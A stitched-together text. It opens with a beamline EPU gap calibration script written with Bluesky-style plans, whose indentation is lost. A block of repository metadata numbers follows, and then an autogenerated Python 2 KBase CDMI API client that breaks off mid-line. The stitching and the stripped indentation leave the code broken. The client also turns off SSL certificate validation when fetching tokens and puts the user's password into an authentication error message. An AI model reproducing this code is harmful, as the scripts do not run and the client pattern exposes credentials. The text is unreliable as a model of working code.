#for i in range(800,2001,50):
#calc_gap=e2g(i/3)
#yield from mv(pgm.en,i)
#yield from sleep(5)
#yield from mv(epu1.gap,calc_gap-2)
#yield from sleep(10)
#yield from rel_scan(dets, epu1.gap,0,4,41)
#yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0]-0.5)
#yield from sleep(10)
#yield from rel_scan(dets, epu1.gap,0,1.0,76)
calc_gap=e2g(850)
yield from mv(pgm.en,850)
yield from sleep(5)
yield from mv(epu1.gap,calc_gap)
def epu_calib_ph28p5_gr500(dets = [sclr, ring_curr]):
print('\n\n WARNING WARNING WARNING:\n\t check if there scalar is installed or not!!!!')
print('\n\n WARNING WARNING WARNING:\n\t this assumes epu interpolation table is DISABLED!!!!')
yield from gcdiag.diode
yield from mv(extslt.hg,300)
yield from mv(extslt.vg,30)
# srs settings for diode = SRS settings: 5 x10 uA/v , time = 1.0
# Current gap limit is 18mm
yield from mv(epu1.phase, 28.5)
#yield from mv(feslt.hg,2.0)
#yield from mv(feslt.vg,2.0)
#yield from bp.mv(pgm.cff,2.24)
#1st Harmonic at 320 eV
#yield from mv(pgm.en,320,epu1.gap,17.05)
#yield from sleep(10)
#yield from rel_scan(dets,epu1.gap,0,1,30)
#yield from mv(epu1.gap,17.05)
#yield from sleep(10)
#yield from rel_scan(dets,epu1.gap,0,1,50)
#1st Harmonic
for i in range(400,451,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i,epu1.gap,calc_gap-1.4-7.8 -(i-350)*0.0067)
yield from sleep(10)
yield from rel_scan(dets,epu1.gap,0,3,30)
yield from mv(epu1.gap,peaks['max']['sclr_channels_chan2'][0]-1)
yield from sleep(10)
yield from rel_scan(dets,epu1.gap,0,2,100)
for i in range(500,1351,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i,epu1.gap,calc_gap-3-7.8 -(i-350)*0.0067)
yield from sleep(10)
yield from rel_scan(dets,epu1.gap,0,6,30)
yield from mv(epu1.gap,peaks['max']['sclr_channels_chan2'][0]-1)
yield from sleep(10)
yield from rel_scan(dets,epu1.gap,0,2,100)
yield from sleep(100)
#3rd Harmonic
for i in range(1100,1601,50):
calc_gap=e2g(i/3)
yield from mv(pgm.en,i,epu1.gap,calc_gap-0.5-8-(i-1000)*0.0027)
yield from sleep(10)
yield from rel_scan(dets,epu1.gap,0,2,30)
yield from mv(epu1.gap,peaks['max']['sclr_channels_chan2'][0]-0.5)
yield from sleep(10)
yield from rel_scan(dets,epu1.gap,0,1.0,75)
yield from mv(pgm.en,931.6)
yield from sleep(5)
yield from mv(epu1.gap,29.56)
yield from mv(shutterb,'close')
def epu_calib_ph28p5_gr1800(dets = [sclr, ring_curr]):
print('\n\n WARNING WARNING WARNING:\n\t check if there scalar is installed or not!!!!')
print('\n\n WARNING WARNING WARNING:\n\t this assumes epu interpolation table is DISABLED!!!!')
yield from gcdiag.diode
# srs settings for diode = SRS settings: 5 x1 uA/v
# Current gap limit is 18mm
yield from mv(epu1.phase, 28.5)
#yield from mv(feslt.hg,2.0)
#yield from mv(feslt.vg,2.0)
#yield from bp.mv(pgm.cff,5.2707)
yield from mv(pgm.en,350)
yield from sleep(5)
yield from mv(epu1.gap,18.01)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,2,31)
yield from mv(epu1.gap, 18.01)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,1,51)
for i in range(400,451,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i)
yield from sleep(5)
yield from mv(epu1.gap,calc_gap-1.4-7.8 -(i-350)*0.0067)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,3,31)
yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0] -1)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,2,101)
for i in range(500,1351,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i)
yield from sleep(5)
yield from mv(epu1.gap,calc_gap-2-7.8 -(i-350)*0.0067)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,3,31)
yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0] -1)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,2,101)
yield from sleep(30)
#800-1550 eV, 3rd harmonic
#for i in range(1100,2001,50):
#calc_gap=e2g(i/3)
#yield from mv(pgm.en,i)
#yield from sleep(5)
#yield from mv(epu1.gap,calc_gap-8.5-(i-1000)*0.0027)
#yield from sleep(10)
#yield from rel_scan(dets, epu1.gap,0,2,31)
#yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0]-0.5)
#yield from sleep(10)
#yield from rel_scan(dets, epu1.gap,0,1.0,76)
calc_gap=e2g(850)
yield from mv(pgm.en,530)
yield from sleep(5)
yield from mv(epu1.phase,0)
yield from mv(epu1.gap,28.01)
yield from mv(shutterb,'close')
print('\n\n WARNING WARNING WARNING:\n\t EPU Table/Interpolation disabled!!!!')
print('\n\n WARNING WARNING WARNING:\n\t M1 Feedback disabled!!!!')
def epu_calib_ph28p5_gr1800_v2(dets = [sclr, ring_curr]):
print('\n\n WARNING WARNING WARNING:\n\t check if there scalar is installed or not!!!!')
print('\n\n WARNING WARNING WARNING:\n\t this assumes epu interpolation table is DISABLED!!!!')
yield from gcdiag.diode
# srs settings for diode = SRS settings: 5 x1 uA/v
# Current gap limit is 18mm
yield from mv(epu1.phase, 28.5)
#yield from mv(feslt.hg,2.0)
#yield from mv(feslt.vg,2.0)
#yield from bp.mv(pgm.cff,5.2707)
yield from sleep(30)
#800-1550 eV, 3rd harmonic
for i in range(1100,2001,50):
calc_gap=e2g(i/3)
yield from mv(pgm.en,i)
yield from sleep(5)
yield from mv(epu1.gap,calc_gap-8.5-(i-1000)*0.0027)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,2,31)
yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0]-0.5)
yield from sleep(10)
yield from rel_scan(dets, epu1.gap,0,1.0,76)
calc_gap=e2g(850)
yield from mv(pgm.en,850)
yield from sleep(5)
yield from mv(epu1.gap,28.01)
yield from mv(shutterb,'close')
print('\n\n WARNING WARNING WARNING:\n\t EPU Table/Interpolation disabled!!!!')
print('\n\n WARNING WARNING WARNING:\n\t M1 Feedback disabled!!!!')
| 34.113772
| 99
| 0.626558
| 2,016
| 11,394
| 3.478671
| 0.071429
| 0.25795
| 0.14744
| 0.098389
| 0.972765
| 0.956224
| 0.948667
| 0.944959
| 0.934693
| 0.919435
| 0
| 0.104414
| 0.238459
| 11,394
| 333
| 100
| 34.216216
| 0.703815
| 0.177374
| 0
| 0.857143
| 0
| 0
| 0.166577
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0
| 0
| 0
| 0.028571
| 0.080952
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dfd3db12939f914636be4a1513f7e352e388ac3d
| 898,814
|
py
|
Python
|
src/biokbase/cdmi/client.py
|
teharrison/narrative
|
71e2c49dfd1426d4a05e1f078946eaa271cae46a
|
[
"MIT"
] | null | null | null |
src/biokbase/cdmi/client.py
|
teharrison/narrative
|
71e2c49dfd1426d4a05e1f078946eaa271cae46a
|
[
"MIT"
] | null | null | null |
src/biokbase/cdmi/client.py
|
teharrison/narrative
|
71e2c49dfd1426d4a05e1f078946eaa271cae46a
|
[
"MIT"
] | null | null | null |
############################################################
#
# Autogenerated by the KBase type compiler -
# any changes made here will be overwritten
#
# Passes on URLError, timeout, and BadStatusLine exceptions.
# See:
# http://docs.python.org/2/library/urllib2.html
# http://docs.python.org/2/library/httplib.html
#
############################################################
try:
import json
except ImportError:
import sys
sys.path.append('simplejson-2.3.3')
import simplejson as json
import urllib2
import httplib
import urlparse
import random
import base64
import httplib2
from urllib2 import URLError, HTTPError
from ConfigParser import ConfigParser
import os
_CT = 'content-type'
_AJ = 'application/json'
_URL_SCHEME = frozenset(['http', 'https'])
def _get_token(user_id, password,
auth_svc='https://nexus.api.globusonline.org/goauth/token?' +
'grant_type=client_credentials'):
# This is bandaid helper function until we get a full
# KBase python auth client released
h = httplib2.Http(disable_ssl_certificate_validation=True)
auth = base64.encodestring(user_id + ':' + password)
headers = {'Authorization': 'Basic ' + auth}
h.add_credentials(user_id, password)
h.follow_all_redirects = True
url = auth_svc
resp, content = h.request(url, 'GET', headers=headers)
status = int(resp['status'])
if status >= 200 and status <= 299:
tok = json.loads(content)
elif status == 403:
raise Exception('Authentication failed: Bad user_id/password ' +
'combination %s:%s' % (user_id, password))
else:
raise Exception(str(resp))
return tok['access_token']
def _read_rcfile(file=os.environ['HOME'] + '/.authrc'): # @ReservedAssignment
# Another bandaid to read in the ~/.authrc file if one is present
authdata = None
if os.path.exists(file):
try:
with open(file) as authrc:
rawdata = json.load(authrc)
# strip down whatever we read to only what is legit
authdata = {x: rawdata.get(x) for x in (
'user_id', 'token', 'client_secret', 'keyfile',
'keyfile_passphrase', 'password')}
except Exception, e:
print "Error while reading authrc file %s: %s" % (file, e)
return authdata
def _read_inifile(file=os.environ.get( # @ReservedAssignment
'KB_DEPLOYMENT_CONFIG', os.environ['HOME'] +
'/.kbase_config')):
# Another bandaid to read in the ~/.kbase_config file if one is present
authdata = None
if os.path.exists(file):
try:
config = ConfigParser()
config.read(file)
# strip down whatever we read to only what is legit
authdata = {x: config.get('authentication', x)
if config.has_option('authentication', x)
else None for x in
('user_id', 'token', 'client_secret',
'keyfile', 'keyfile_passphrase', 'password')}
except Exception, e:
print "Error while reading INI file %s: %s" % (file, e)
return authdata
class ServerError(Exception):
def __init__(self, name, code, message, data=None, error=None):
self.name = name
self.code = code
self.message = '' if message is None else message
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
return json.JSONEncoder.default(self, obj)
class CDMI_API(object):
def __init__(self, url=None, timeout=30 * 60, user_id=None,
password=None, token=None, ignore_authrc=False):
if url is None:
url = 'http://kbase.us/services/cdmi_api'
scheme, _, _, _, _, _ = urlparse.urlparse(url)
if scheme not in _URL_SCHEME:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
self._headers = dict()
# token overrides user_id and password
if token is not None:
self._headers['AUTHORIZATION'] = token
elif user_id is not None and password is not None:
self._headers['AUTHORIZATION'] = _get_token(user_id, password)
elif 'KB_AUTH_TOKEN' in os.environ:
self._headers['AUTHORIZATION'] = os.environ.get('KB_AUTH_TOKEN')
elif not ignore_authrc:
authdata = _read_inifile()
if authdata is None:
authdata = _read_rcfile()
if authdata is not None:
if authdata.get('token') is not None:
self._headers['AUTHORIZATION'] = authdata['token']
elif(authdata.get('user_id') is not None
and authdata.get('password') is not None):
self._headers['AUTHORIZATION'] = _get_token(
authdata['user_id'], authdata['password'])
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def fids_to_annotations(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_annotations',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_functions(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_functions',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_literature(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_literature',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_protein_families(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_protein_families',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_roles(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_roles',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_subsystems(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_subsystems',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_co_occurring_fids(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_co_occurring_fids',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_locations(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_locations',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def locations_to_fids(self, region_of_dna_strings):
arg_hash = {'method': 'CDMI_API.locations_to_fids',
'params': [region_of_dna_strings],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def alleles_to_bp_locs(self, alleles):
arg_hash = {'method': 'CDMI_API.alleles_to_bp_locs',
'params': [alleles],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def region_to_fids(self, region_of_dna):
arg_hash = {'method': 'CDMI_API.region_to_fids',
'params': [region_of_dna],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def region_to_alleles(self, region_of_dna):
arg_hash = {'method': 'CDMI_API.region_to_alleles',
'params': [region_of_dna],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def alleles_to_traits(self, alleles):
arg_hash = {'method': 'CDMI_API.alleles_to_traits',
'params': [alleles],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def traits_to_alleles(self, traits):
arg_hash = {'method': 'CDMI_API.traits_to_alleles',
'params': [traits],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def ous_with_trait(self, genome, trait, measurement_type, min_value, max_value):
arg_hash = {'method': 'CDMI_API.ous_with_trait',
'params': [genome, trait, measurement_type, min_value, max_value],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def locations_to_dna_sequences(self, locations):
arg_hash = {'method': 'CDMI_API.locations_to_dna_sequences',
'params': [locations],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def proteins_to_fids(self, proteins):
arg_hash = {'method': 'CDMI_API.proteins_to_fids',
'params': [proteins],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def proteins_to_protein_families(self, proteins):
arg_hash = {'method': 'CDMI_API.proteins_to_protein_families',
'params': [proteins],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def proteins_to_literature(self, proteins):
arg_hash = {'method': 'CDMI_API.proteins_to_literature',
'params': [proteins],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def proteins_to_functions(self, proteins):
arg_hash = {'method': 'CDMI_API.proteins_to_functions',
'params': [proteins],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def proteins_to_roles(self, proteins):
arg_hash = {'method': 'CDMI_API.proteins_to_roles',
'params': [proteins],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def roles_to_proteins(self, roles):
arg_hash = {'method': 'CDMI_API.roles_to_proteins',
'params': [roles],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def roles_to_subsystems(self, roles):
arg_hash = {'method': 'CDMI_API.roles_to_subsystems',
'params': [roles],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
